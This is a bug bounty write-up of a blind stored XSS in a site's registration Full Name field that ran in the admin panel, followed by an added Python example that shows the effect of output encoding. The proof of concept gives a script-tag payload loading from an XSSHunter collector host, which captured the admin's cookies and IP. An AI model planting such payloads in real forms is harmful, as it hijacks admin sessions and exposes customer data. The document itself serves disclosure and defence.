Description:
A blind XSS fires in the admin panel through the name parameter. The registration form has a Full Name field; I filled it with an XSS payload, using XSSHunter to catch the execution. The next day I found my XSS result on the XSSHunter dashboard, triggered from their admin panel. I was able to see the admin's IP, cookies, the admin path, etc. Maybe the admin activates or reviews the user registrations.
PoC:
1. Register a new account and fill the Full Name field with the payload from XSSHunter. ( "><script src=https://apapedulim.xss.ht></script> )
2. Complete the registration.
3. Wait until the next day.
Impact:
Obtaining the admin's IP, cookies and admin path through the XSS, and being able to get the list of other customers' details such as names and IDs.
How do you know it's blind XSS on the admin page?
Actually, I wasn't sure when I first found it. After registering my account, I got the email from the website to confirm my account, and my name was shown as ">. In my recent tests, when I use that payload and it just shows ">, the XSS payload will execute. I assumed it would be stored XSS and would fire in the admin panel, so I waited, and got the response from the admin panel.
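Why only "> stays visible when the name is written into HTML unencoded, and what output encoding changes, as an added example that is not part of the original write-up. The table-cell template, the function names and the collector.example host are assumptions, and Python's standard HTML parser stands in for the browser.

```python
import html
from html.parser import HTMLParser

# Same shape as the payload in the PoC; the host is a constructed placeholder.
FULL_NAME = '"><script src=https://collector.example></script>'

class Audit(HTMLParser):
    """Records the text a reader would see and the scripts a page would load."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.text, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append(dict(attrs).get("src"))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            self.text.append(data)

def render_unsafe(name):
    # Hypothetical admin "pending registrations" cell: raw interpolation.
    return "<td>" + name + "</td>"

def render_safe(name):
    # Same cell with output encoding applied where the value meets HTML.
    return "<td>" + html.escape(name, quote=True) + "</td>"

def audit(markup):
    parser = Audit()
    parser.feed(markup)
    parser.close()
    return "".join(parser.text), parser.scripts

def renders_as_text(render, name):
    # Regression check for a template: the whole value must come back as
    # visible text and must not add any script element.
    text, scripts = audit(render(name))
    return text == name and not scripts

if __name__ == "__main__":
    print(audit(render_unsafe(FULL_NAME)))  # name collapses to '">', script loads
    print(audit(render_safe(FULL_NAME)))    # full string shown, nothing loads
```

A check like renders_as_text can run against every template that prints user-supplied registration fields, including back-office views that only staff ever open.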
Note: The team requested limited disclosure.
I contacted the team via their contact page and got a positive response from them. After seeing my report they fixed the vuln and will send me some SWAG. Yay!
Thanks.